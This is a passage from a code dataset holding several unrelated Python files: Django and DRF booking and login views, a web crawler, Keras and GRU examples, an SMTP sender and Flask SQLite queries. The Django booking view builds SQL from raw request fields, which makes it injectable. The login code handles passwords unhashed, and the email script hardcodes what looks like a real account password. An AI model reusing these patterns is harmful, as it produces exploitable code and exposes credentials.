{\"mobile\": row1[0], \"email\": row1[1], \"name\": row1[3], \"address\": row1[4]}\r\n return render(request,\"proceedtopayment1.html\",{\"ar\":d,\"ar1\":d1,\"ar2\":d2})\r\n\r\n@csrf_exempt\r\ndef userbooking(request):\r\n dateofbooking = date.today()\r\n roomid = request.POST['roomid']\r\n tariff = request.POST['persons']\r\n extraperson = request.POST['extraperson']\r\n checkin = request.POST['checkin']\r\n chkout = request.POST['checkout']\r\n bookeremail=request.POST['email']\r\n bookeraddress=request.POST['address']\r\n bookermobile=request.POST['mobile']\r\n hostid=request.POST['hostid']\r\n total=request.POST['total']\r\n print(total)\r\n paymentmode = request.POST['paymentmode']\r\n paymentstatus = \"success\"\r\n if paymentmode == \"Cash\":\r\n total = 0.0\r\n paymentstatus = \"pending\"\r\n conn = Connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q = f\"insert into booking 
values(NULL,'{roomid}','{tariff}','{extraperson}','{checkin}','{chkout}','{bookeremail}','{bookeraddress}','{bookermobile}','{hostid}','{total}','{dateofbooking}','{paymentmode}','{paymentstatus}','pending')\"\r\n print(q)\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n bookingid = cr.lastrowid\r\n conn.commit()\r\n msg = \"Your booking was completed successfully!\" # currently unused\r\n return JsonResponse({\"bookingid\": bookingid}, safe=False)\r\n\r\ndef thankspage(request):\r\n bookingid = request.GET[\"bookingid\"]\r\n amount = request.GET[\"amount\"]\r\n status = request.GET[\"status\"]\r\n return render(request,\"thankspage.html\",{\"amount\":amount,\"bookingid\":bookingid,\"status\":status})","sub_path":"DJango_project/SpareSpace/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":37296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"341009663","text":"# -*- coding:utf-8 -*-\nfrom app.models import WxNotifyTemplate\n\nLINK_COLOR = '#173177'\nNORMAL_COLOR = '#000000'\nFAILED_COLOR = '#DC143C'\nYOOQUN_COLOR = '#E75D29'\n\n\nclass WxTempNotifierBase:\n def __init__(self, session, wechat_service):\n self.session = session\n self.wechat_service = wechat_service\n\n def get_temp(self, code):\n return self.session.query(WxNotifyTemplate).filter_by(code=code).first()\n\n def send_notification(self, to_openid, template, data, url=None):\n try:\n self.wechat_service.message.send_template(to_openid, template.template_id, data, url)\n except Exception as e:\n print(e)\n","sub_path":"app/services/wechat_notifier/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"277864107","text":"import uuid\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom clubs.models import Club\nfrom clubs.models import Institute\nfrom clubs.serializers import InstituteSerializer\nfrom users.models import User\nfrom users.models import Token\nfrom users.serializers import UserSerializer\nfrom utils import restful_status\nfrom clubs.serializers import ClubSerializer\n\n\nclass RegisterView(APIView):\n\n authentication_classes = []\n\n def post(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS,\n 'msg': ''\n }\n username = request.data.get('username')\n # reject duplicate usernames\n if User.objects.filter(username=username).count():\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = username + ' already exists'\n return Response(ret_data)\n # password is md5 code\n password = request.data.get('password')\n nickname = request.data.get('nickname')\n mobile = request.data.get('mobile')\n admission_time = request.data.get('admission_time')\n is_admin = False\n institute_id = request.data.get('institute_id')\n # create the new user\n user = User.objects.create(username=username, password=password,\n nickname=nickname, is_admin=is_admin, institute_id=institute_id,\n mobile=mobile, admission_time=admission_time)\n ret_data['msg'] = username + ' registered successfully'\n return Response(ret_data)\n\n\nclass LoginView(APIView):\n \"\"\"User login view.\n\n Notes\n -----\n Intercepts the login POST request and signs the user in.\n \"\"\"\n\n # login itself requires no authentication\n authentication_classes = []\n\n def post(self, request, *args, **kwargs):\n \"\"\"POST request.\n\n Parameters\n ----------\n request : DRF Request object\n\n Returns\n -------\n ret_data : DRF Response\n \"\"\"\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS,\n 'msg': ''\n }\n\n username = request.data.get('username')\n password = request.data.get('password')\n user = User.objects.filter(username=username, password=password).values('id', 'username')\n if user.count():\n user = user.first()\n token = uuid.uuid4()\n Token.objects.update_or_create(user_id=user.get('id'),\n defaults={'user_id': user.get('id'), 'token': token})\n ret_data['msg'] = 'login successful'\n ret_data['username'] = username\n ret_data['userId'] = user.get('id')\n ret_data['token'] = token\n return Response(ret_data)\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = 'incorrect username or password'\n return Response(ret_data)\n\n\nclass UserViewSet(GenericViewSet):\n\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n def list(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS\n }\n club_id = request.query_params.get('clubId')\n club = Club.objects.filter(id=club_id).first()\n users = User.objects.filter(clubs=club)\n ret_data['users'] = self.serializer_class(users, many=True).data\n return Response(ret_data)\n\n def retrieve(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS\n }\n user_id = request.META.get('PATH_INFO').split('/')[-2]\n queryset = self.queryset\n token = Token.objects.filter(user_id=user_id).values('token').first()\n user = queryset.filter(id=user_id).values('id', 'username',\n 'nickname', 'mobile',\n 'introduction', 'institute_id',\n 'admission_time').first()\n institute_id = user.get('institute_id')\n institute = Institute.objects.filter(id=institute_id).first()\n institute_serializer = InstituteSerializer(institute)\n ret_data['user'] = user\n ret_data['institute'] = institute_serializer.data\n if token.get('token') == request.auth:\n # the logged-in user is viewing their own profile, so include club info\n clubs = Club.objects.filter(user=queryset.filter(id=user_id).first())\n club_serializer = ClubSerializer(clubs, many=True)\n ret_data['clubs'] = club_serializer.data\n return Response(ret_data)\n\n def patch(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS\n }\n user_id = request.META.get('PATH_INFO').split('/')[-2]\n token = Token.objects.filter(user_id=user_id).values('token').first()\n if not token:\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = 'invalid token'\n return Response(ret_data)\n if token.get('token') == request.auth:\n user = User.objects.filter(id=user_id).update(**request.data['dict'])\n else:\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = 'illegal operation'\n return Response(ret_data)\n\n def delete(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS\n }\n user_id = request.META.get('PATH_INFO').split('/')[-2]\n token = Token.objects.filter(user_id=user_id).first()\n if token.token == request.auth:\n token.delete()\n else:\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = 'illegal logout'\n return Response(ret_data)","sub_path":"apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"305035647","text":"#!/usr/bin/env python\r\nfrom urllib.parse import urlparse\r\nfrom urllib.request import urlopen\r\nfrom link_finder import LinkFinder\r\nfrom general import *\r\n\r\nclass Spider:\r\n # class variable which is shared among all instances\r\n project_name=''\r\n base_url=''\r\n domain_name=''\r\n queue_file=''\r\n 
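# NOTE (editor): these class-level attributes are deliberately shared by every Spider instance, so several crawler threads can work off one queue and one crawled set\r\n 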
crawled_file=''\r\n queue=set()\r\n crawled=set()\r\n def __init__(self,project_name,base_url):\r\n Spider.project_name=project_name\r\n Spider.base_url=base_url\r\n # derive the domain from the base url (this was an undefined name before)\r\n Spider.domain_name=urlparse(base_url).netloc\r\n Spider.queue_file=Spider.project_name + '/queue.txt'\r\n Spider.crawled_file=Spider.project_name + '/crawled.txt'\r\n self.boot()\r\n self.crawl_page('First Spider',Spider.base_url)\r\n @staticmethod\r\n def boot():\r\n create_project_dir(Spider.project_name)\r\n create_data_files(Spider.project_name, Spider.base_url)\r\n Spider.queue=file_to_set(Spider.queue_file)\r\n Spider.crawled=file_to_set(Spider.crawled_file)\r\n\r\n @staticmethod\r\n def crawl_page(thread_name, page_url):\r\n if page_url not in Spider.crawled:\r\n print(thread_name + ' crawling ' + page_url)\r\n print('Queue ' + str(len(Spider.queue)) + ' | Crawled ' + str(len(Spider.crawled)))\r\n Spider.add_links_to_queue(Spider.gather_links(page_url))\r\n Spider.queue.discard(page_url) # discard, not remove: the url may not be queued yet\r\n Spider.crawled.add(page_url)\r\n Spider.update_files()\r\n\r\n @staticmethod\r\n def add_links_to_queue(links):\r\n # only queue links we have not seen before\r\n for url in links:\r\n if url not in Spider.queue and url not in Spider.crawled:\r\n Spider.queue.add(url)\r\n\r\n @staticmethod\r\n def update_files():\r\n # persist the in-memory sets back to the data files\r\n # (minimal stand-in for a helper that likely lives in general.py)\r\n with open(Spider.queue_file, 'w') as f:\r\n for url in sorted(Spider.queue):\r\n print(url, file=f)\r\n with open(Spider.crawled_file, 'w') as f:\r\n for url in sorted(Spider.crawled):\r\n print(url, file=f)\r\n\r\n @staticmethod\r\n def gather_links(page_url):\r\n html_string=''\r\n # anytime we are working with networking we wrap it in try/except\r\n try:\r\n response = urlopen(page_url) # connect to the web page\r\n if response.getheader('Content-Type')=='text/html':\r\n html_bytes=response.read()\r\n html_string=html_bytes.decode('utf-8')\r\n finder=LinkFinder(Spider.base_url,page_url)\r\n finder.feed(html_string)\r\n except Exception:\r\n print('Error! Cannot crawl page: ' + page_url)\r\n return set()\r\n return finder.page_links()\r\n ","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"552906031","text":"import sys\nassert sys.version_info >= (3, 5)\n\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\n\ndef generate_time_series(batch_size, n_steps):\n freq1, freq2, offsets1, offsets2 = np.random.rand(4, batch_size, 1)\n time = np.linspace(0, 1, n_steps)\n series = 0.5 * np.sin((time - offsets1) * (freq1 * 10 + 10)) # wave 1\n series += 0.2 * np.sin((time - offsets2) * (freq2 * 20 + 20)) # + wave 2\n series += 0.1 * (np.random.rand(batch_size, n_steps) - 0.5) # + noise\n return series[..., np.newaxis].astype(np.float32)\n\nn_steps = 50\nseries = generate_time_series(10000, n_steps + 1)\nX_train, y_train = series[:7000, :n_steps], series[:7000, -1]\nX_valid, y_valid = series[7000:9000, :n_steps], series[7000:9000, -1]\nX_test, y_test = series[9000:, :n_steps], series[9000:, -1]\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[50, 1]),\n keras.layers.Dense(1)\n])\n\n\n# determine number of epochs\nno_epochs = 20\n\n# set error and optimizer\nmodel.compile(loss=\"mse\", optimizer=\"adam\")\n\nhistory = model.fit(X_train, y_train, epochs=no_epochs, validation_data=(X_valid, y_valid))\nevalu = model.evaluate(X_valid, y_valid)\nprint(history)\nprint(evalu)\nprint(model.metrics_names, evalu)\n","sub_path":"linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"570031897","text":"import matplotlib.pyplot as plt\nfrom sklearn.metrics import r2_score\n\n\ndef plotScatterPlot(actual, predicted, outFileName):\n 'Make a scatter plot showing the model-predicted vs QM-calculated hydricity for each 
reaction'\n plt.scatter(actual, predicted, s=7, color='#4b9da6')\n axes = plt.gca()\n\n # make plot square with equal x and y axes\n bounds = [min(list(actual) + list(predicted) + [0])-1, max(list(actual) + list(predicted))+1]\n plt.axis(bounds * 2)\n axes.set_aspect('equal', adjustable='box')\n\n # plot the identity for visual reference (10% darker than data)\n plt.plot([bounds[0], bounds[1]], [bounds[0], bounds[1]], color='#d95d41')\n\n rSquared = r2_score(actual, predicted)\n print(rSquared)\n plt.figtext(0.6,0.15,'$R^2 = $'+format(rSquared,'.4f'), fontsize=11)\n plt.xlabel('QM Calculated Hydricity (kcal/mol)', fontsize=10)\n plt.ylabel('Model Predicted Hydricity (kcal/mol)', fontsize=10)\n plt.title('Model Predicted vs. QM Calculated Hydricity', fontsize=12)\n plt.tight_layout()\n plt.savefig(str(outFileName) + '.png')\n plt.clf()\n","sub_path":"Python/scatterPlot_hydricitybest.py","file_name":"scatterPlot_hydricitybest.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163723312","text":"# Import smtplib for the actual sending function\nimport sys\nimport getopt\nimport smtplib\n\nsender = 'congxv@rayootech.com'\n# If there are more than one receiver, you need to ganerate a list. \n# receiver = ['a@xxxx','b@xxxx']\nreceiver = ['congxv@rayootech.com'] \nserver = 'smtp.qiye.163.com'\nport = '25'\npwd = 'xucong(5493177)'\n\nCOMMASPACE = ', '\n\n# Import the email modules we'll need\nfrom email.mime.text import MIMEText\n\ndef usage():\n usageStr = '''Usage: SendEmail -c mail_content'''\n #print usageStr\n\ndef main(argv):\n # Get the Email content in the \"-c\" argv\n try:\n opts, args = getopt.getopt(argv, \"c:\")\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n\n content = ''\n\n for opt, arg in opts:\n if opt == '-c':\n content = arg\n\n #print content\n\n msg = MIMEText(content)\n \n msg['Subject'] = 'this is the subject'\n msg['From'] = sender\n msg['To'] = COMMASPACE.join(receiver)\n \n s = smtplib.SMTP(server, port)\n s.ehlo()\n s.login(sender, pwd)\n s.sendmail(sender, receiver, msg.as_string())\n s.quit()\n\nif __name__==\"__main__\":\n main(sys.argv[1:])\n\n","sub_path":"Python/testSendEmail.py","file_name":"testSendEmail.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"169465553","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nfunction: realize gru by pytorch with nn.Module\r\n\"\"\"\r\n\r\nimport sys\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nsys.path.append(\"../d2l_func/\")\r\nfrom data_prepare import load_data_jay_song, data_iter_random, data_iter_consecutive, to_onehot\r\nfrom model_train import train_rnn_pytorch\r\n\r\n\r\nclass RNNModel(nn.Module):\r\n def __init__(self, rnn_layer, vocab_size):\r\n super(RNNModel, self).__init__()\r\n self.rnn = rnn_layer\r\n self.hidden_num = self.rnn.hidden_size * (2 if self.rnn.bidirectional else 1)\r\n self.vocab_size = vocab_size\r\n self.fc = nn.Linear(hidden_num, vocab_size)\r\n self.h_state = None\r\n\r\n def forward(self, x, h_state):\r\n # x.shape is (num_step, batch_size, vocab_size)\r\n y, self.h_state = self.rnn(x, h_state)\r\n return self.fc(y), self.h_state\r\n\r\n\r\ndef predict_rnn_pytorch(prefix, pred_num, model, char_to_idx, vocab_set, vocab_size, device):\r\n outputs = [char_to_idx[prefix[0]]]\r\n h_state = None\r\n\r\n for i in range(len(prefix) + pred_num - 1):\r\n inputs = 
to_onehot(torch.tensor(outputs[-1]).view(-1, 1), vocab_size, device)\r\n if h_state is not None:\r\n if isinstance(h_state, tuple): # lstm , (h,c)\r\n h_state = (h_state[0].to(device), h_state[1].to(device))\r\n else:\r\n h_state = h_state.to(device)\r\n\r\n y, h_state = model(inputs, h_state)\r\n if i + 1 < len(prefix):\r\n outputs.append(char_to_idx[prefix[i + 1]])\r\n else:\r\n outputs.append(y.argmax(dim=2).item())\r\n\r\n return \"\".join(vocab_set[i] for i in outputs)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # load data\r\n corpus_index, char_to_idx, vocab_set, vocab_size = load_data_jay_song()\r\n # model\r\n hidden_num = 256\r\n rnn_layer = nn.GRU(vocab_size, hidden_num)\r\n model = RNNModel(rnn_layer, vocab_size)\r\n model = model.cuda()\r\n loss = nn.CrossEntropyLoss()\r\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\r\n\r\n params = {\r\n \"epoch_num\": 10,\r\n \"model\": model,\r\n \"loss\": loss,\r\n \"optimizer\": optimizer,\r\n \"batch_size\": 64,\r\n \"num_step\": 32,\r\n \"corpus_index\": corpus_index,\r\n \"data_iter\": data_iter_consecutive,\r\n \"char_to_idx\": char_to_idx,\r\n \"vocab_set\": vocab_set,\r\n \"vocab_size\": vocab_size,\r\n \"predict_rnn_pytorch\": predict_rnn_pytorch,\r\n \"pred_num\": 50,\r\n \"prefixs\": [\"分开\", \"不分开\"],\r\n \"random_sample\": False\r\n }\r\n\r\n params[\"batch_num\"] = len(list(data_iter_consecutive(corpus_index, params[\"batch_size\"],\r\n params[\"num_step\"], \"cpu\")))\r\n\r\n train_rnn_pytorch(**params)\r\n","sub_path":"7.RNNs/gru_pytorch_sample.py","file_name":"gru_pytorch_sample.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"583084255","text":"# -- coding: utf-8 --\n\n# Copyright 2018 Olivier Scholder \n\nfrom PyQt5.QtCore import QSize\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QSizePolicy\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.figure import Figure\n\n\nclass MplCanvas(FigureCanvas):\n def __init__(self):\n self.fig = Figure()\n FigureCanvas.__init__(self, self.fig)\n FigureCanvas.setSizePolicy(self,\n QSizePolicy.Expanding,\n QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n def sizeHint(self):\n w, h = self.get_width_height()\n return QSize(w, h)\n\n\nclass MplWidget(QWidget):\n def __init__(self, parent=None):\n QWidget.__init__(self, parent)\n self.canvas = MplCanvas()\n self.mpl_toolbar = NavigationToolbar(self.canvas, self)\n layout = QVBoxLayout()\n self.setLayout(layout)\n layout.addWidget(self.mpl_toolbar)\n layout.addWidget(self.canvas)\n","sub_path":"pySPM/mplwidget.py","file_name":"mplwidget.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"343682673","text":"#!/usr/bin/python3\n\nimport json\nimport glob\nimport pprint\n\n\ndef group_by(ds, k):\n\tret = {}\n\tfor d in ds:\n\t\tif d[k] not in ret:\n\t\t\tret[d[k]] = []\n\t\tret[d[k]].append(d)\n\treturn ret\n\n\ndef load_all():\n\tfor fn in glob.glob('*.jsons'):\n\t\tyield from load(fn)\n\n\ndef load(fn):\n\twith open(fn) as f:\n\t\tfor line in f:\n\t\t\tline = line.strip()\n\t\t\td = json.loads(line)\n\t\t\tyield d\n\n\ndef count_it(d):\n\tret = {}\n\tfor k, v in d.items():\n\t\tret[k] = {}\n\t\tfor k2, v2 in v.items():\n\t\t\tcount = len(v2)\n\t\t\tret[k][k2] = count\n\treturn 
ret\n\n\ndef main():\n\tby_mj = group_by(load_all(), 'mj')\n\tby_mj_k = {k: group_by(v, 'k') for k, v in by_mj.items()}\n\twith open('pulseout.txt', 'w') as f:\n\t\tpprint.pprint(by_mj_k, f)\n\tcounted = count_it(by_mj_k)\n\twith open('pulseout_count.txt', 'w') as f:\n\t\t#print(json.dumps(counted, indent=2))\n\t\tpprint.pprint(counted, f)\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"pulseout.py","file_name":"pulseout.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"88887926","text":"import sys\nsys.path.append('/Users/mauroconte/Desktop/iogif/src/')\n\nimport numpy as np\nimport cv2\nimport os\nimport uuid\nimport time\n\nimport util\nfrom vector_quantization import *\n\ndef compose_h_w(module=64, n=9):\n images = list(map(lambda name: cv2.imread(f'tmp/{name}',1), os.listdir('tmp')))\n randoms = []\n if n**2-len(images)>0:\n randoms = np.random.randint(0, len(images), n**2-len(images))\n\n for index in randoms:\n images.append(images[index])\n\n for i in range(len(images)):\n images[i] = cv2.resize(images[i], (module, module), interpolation = cv2.INTER_AREA)\n\n base = np.zeros((module*n,module*n, 3),np.uint8)\n for i in range(n**2):\n r,c = i//n, i%n\n base[r*module:(r+1)*module, c*module:(c+1)*module] = images[i]\n\n cv2.imwrite(\"io9x9.png\",base)\n\ndef main():\n\n _id = uuid.uuid4()\n\n img = util.get_billie()\n\n print(\"Vector Quantization (LBG) on iamge of shape:\", img.shape)\n q, _, _ = LGB(img, 4)\n cv2.imwrite(\"out/q4.png\",q)\n\n img = cv2.imread('out/q4.png')\n os.makedirs(f'out/{_id}')\n for i in range(10):\n print(\"colormap\", i)\n img = util.colormap(img,[])\n cv2.imwrite(f'out/{_id}/{uuid.uuid4()}.png', img)\n\n util.make_gif_from_folder(f'out/{_id}')\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"422398292","text":"# https://www.geeksforgeeks.org/find-the-row-with-maximum-number-1s/\n\n# Given a boolean 2D array of n x m dimensions where each row is sorted.\n# Find the 0-based index of the first row that has the maximum number of 1's.\n\ndef rowWithMax1s(arr, n, m):\n row_index = -1\n # for i in range(m):\n # if arr[0][i] == 1:\n # row_index = 0\n # col_index = i\n # break\n # if col_index is None:\n # col_index = m-1\n col_index = m-1\n for i in range(n):\n while col_index >= 0 and arr[i][col_index] == 1:\n col_index -= 1\n row_index = i\n return row_index\n\nn1 = [0,1,1,1]\nn2 = [0,0,1,1]\nn3 = [1,1,1,1]\nn4 = [0,0,0,1]\narr =[]\narr.append(n1)\narr.append(n2)\narr.append(n3)\narr.append(n4)\nprint(rowWithMax1s(arr, 4, 4))","sub_path":"lc/max_num_of_1s.py","file_name":"max_num_of_1s.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"294061669","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport pyfirmata\nimport datetime\nimport matplotlib.animation as animation\n\nclass Motor:\n\t'Common base class for all employees'\n\tMotCount = 0\n\n\tdef __init__(self, pos, l, w):\n\t\tMotor.MotCount += 1\n\t\tself.vel = 0\n\t\tself.pos = pos\n\t\tself.l = l\n\t\tself.w = w\n\n\tdef set_vel(self, v, ang):\n\t\tang = ang*np.pi/180\n\t\ta = self.l/(np.tan(ang) + 1e-5)\n\t\tif self.pos=='der':\n\t\t\tself.vel = v*(1 + 
self.w/2/a)\n\t\telif self.pos=='izq':\n\t\t\tself.vel = v*(1 - self.w/2/a)\n","sub_path":"motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"460911336","text":"from flask import (\n Blueprint, g, request, session\n)\n\nfrom hermes.db import get_db\nfrom uuid import uuid4\n\nimport datetime\nimport random\n\nbp = Blueprint('queries', __name__)\n\n# Categories\ndef category_values_for_current_org():\n # SUM value of transactions for given category\n db = get_db()\n\n category_values = db.execute(\n 'SELECT'\n ' *, '\n ' CASE'\n ' WHEN sum(trans_value_net) is Null THEN 0'\n ' ELSE sum(trans_value_net)'\n ' END AS \"value\"'\n ' FROM'\n ' categories'\n ' LEFT JOIN'\n ' transactions on category_id_fk = category_id'\n ' JOIN'\n ' category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' categories.org_id_fk = ?'\n ' GROUP BY'\n ' category_id'\n ' ORDER BY'\n ' cat_type_order ASC,'\n ' value DESC',\n (\n session['current_org'],\n )\n ).fetchall()\n\n return category_values\n\n\ndef get_transactions_for_category(category_id):\n db = get_db()\n\n transactions = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' transactions'\n ' JOIN'\n ' user on user_id = user_id_fk'\n ' WHERE'\n ' org_id_fk = ? and'\n ' category_id_fk = ?',\n (\n session['current_org'],\n category_id,\n )\n ).fetchall()\n\n return transactions\n\n\ndef get_all_categories_for_org():\n db = get_db()\n\n categories = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' categories'\n ' JOIN'\n ' category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' org_id_fk = ?',\n (\n session['current_org'],\n )\n ).fetchall()\n\n return categories\n\n\ndef get_category_by_id(cat_id):\n db = get_db()\n\n category = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' categories'\n ' WHERE'\n ' category_id = ?',\n (\n cat_id,\n )\n ).fetchone()\n\n return category\n\n\ndef change_category_status(status_flag, cat_id):\n db = get_db()\n\n db.execute(\n 'UPDATE'\n ' categories'\n ' SET'\n ' category_enabled_flag = ?'\n ' WHERE'\n ' category_id = ?',\n (\n status_flag,\n cat_id,\n )\n )\n\n db.commit()\n\n\ndef change_org_status(org_id):\n db = get_db()\n\n org = get_org_by_id(org_id)\n\n status_flag = org['org_enabled_flag']\n\n if status_flag == 0:\n status_flag = 1\n else:\n status_flag = 0\n\n db.execute(\n 'UPDATE'\n ' organisation'\n ' SET'\n ' org_enabled_flag = ?'\n ' WHERE'\n ' org_id = ?',\n (\n status_flag,\n org_id,\n )\n )\n\n db.commit()\n\n\ndef create_category(form_data):\n db = get_db()\n\n cat_id = str(uuid4())\n\n db.execute(\n 'INSERT INTO categories ('\n ' category_id,'\n ' category_name,'\n ' category_enabled_flag,'\n ' org_id_fk,'\n ' cat_type_id_fk'\n ') VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ' )',\n (\n cat_id,\n form_data['cat_name'],\n form_data['active_flag'],\n session['current_org'],\n form_data['type_id'],\n )\n )\n\n db.commit()\n\n return cat_id\n\n\ndef update_category(form_data, cat_id):\n db = get_db()\n\n db.execute(\n 'UPDATE'\n ' categories'\n ' SET'\n ' category_name = ?,'\n ' category_enabled_flag = ?, '\n ' cat_type_id_fk = ?'\n ' WHERE'\n ' category_id = ?',\n (\n form_data['cat_name'],\n form_data['active_flag'],\n form_data['type_id'],\n cat_id,\n )\n )\n\n db.commit()\n\n\ndef get_category_types():\n db = get_db()\n\n cat_types = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' category_type'\n ).fetchall()\n\n return cat_types\n\n\ndef get_all_orgs_for_current_user():\n db = get_db()\n\n 
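# NOTE (editor): membership comes from the user_organisation link table (see add_org_permissions below), so a user only ever sees organisations they were explicitly granted\r\n 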
organisations = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' organisation'\n ' JOIN'\n ' user_organisation on org_id = org_id_fk'\n ' LEFT JOIN'\n ' organisation_type on org_type = org_type_id'\n ' WHERE'\n ' user_id_fk = ?',\n (\n session['user_id'],\n )\n ).fetchall()\n\n return organisations\n\n\ndef get_active_orgs_for_current_user():\n db = get_db()\n\n orgs = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' organisation'\n ' JOIN'\n ' user_organisation on org_id = org_id_fk'\n ' WHERE'\n ' user_id_fk = ? and'\n ' org_enabled_flag = 1',\n (\n session['user_id'],\n )\n ).fetchall()\n\n return orgs\n\ndef get_all_orgs():\n db = get_db()\n\n orgs = db.execute(\n 'SELECT * FROM organisation'\n ).fetchall()\n\n return orgs\n\n\ndef create_organisation(form_data):\n db = get_db()\n\n org_id = str(uuid4())\n\n db.execute(\n 'INSERT INTO organisation ('\n ' org_id,'\n ' org_name,'\n ' org_enabled_flag,'\n ' org_vat,'\n ' org_number,'\n ' org_type,'\n ' org_vat_flag'\n ' ) VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ' )',\n (\n org_id,\n form_data['org_name'],\n form_data['org_enabled_flag'],\n form_data['org_vat'],\n form_data['org_no'],\n form_data['org_type'],\n form_data['org_vat_flag'],\n )\n )\n\n add_org_permissions(\n g.user['user_id'],\n org_id,\n )\n\n db.commit()\n\n return org_id\n\n\ndef get_organisation_types():\n db = get_db()\n\n org_types = db.execute(\n 'SELECT *'\n ' FROM organisation_type'\n ).fetchall()\n\n return org_types\n\n\ndef add_org_permissions(user_id, org_id):\n # add user permissions for own organisations\n db = get_db()\n\n db.execute(\n 'INSERT INTO user_organisation ('\n ' user_id_fk,'\n ' org_id_fk'\n ' ) VALUES ('\n ' ?,'\n ' ?'\n ' )',\n (\n user_id,\n org_id,\n )\n )\n\n db.commit()\n\n\ndef update_organistation(form_data, org_id):\n db = get_db()\n\n db.execute(\n 'UPDATE'\n ' organisation'\n ' SET'\n ' org_name = ?,'\n ' org_enabled_flag = ?,'\n ' org_type = ?,'\n ' org_vat = ?,'\n ' org_number = ?'\n ' WHERE'\n ' org_id = ?',\n (\n form_data['org_name'],\n form_data['org_enabled_flag'],\n form_data['org_type'],\n form_data['org_vat'],\n form_data['org_no'],\n org_id,\n )\n )\n\n db.commit()\n\n\ndef get_org_by_id(org_id):\n db = get_db()\n\n org = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' organisation'\n ' WHERE'\n ' org_id = ?',\n (\n org_id,\n )\n ).fetchone()\n\n return org\n\n\ndef get_bank_accounts_for_current_org():\n db = get_db()\n\n accounts = db.execute(\n 'SELECT'\n ' bank_id,'\n ' bank_name,'\n ' bank_reference,'\n ' bank_enabled_flag,'\n ' bank_currency_code,'\n ' IFNULL(bank_balance, 0) as \"bank_balance\",'\n ' bank_count.bank_count,'\n ' row_number()over(order by bank_id) as row_no'\n ' 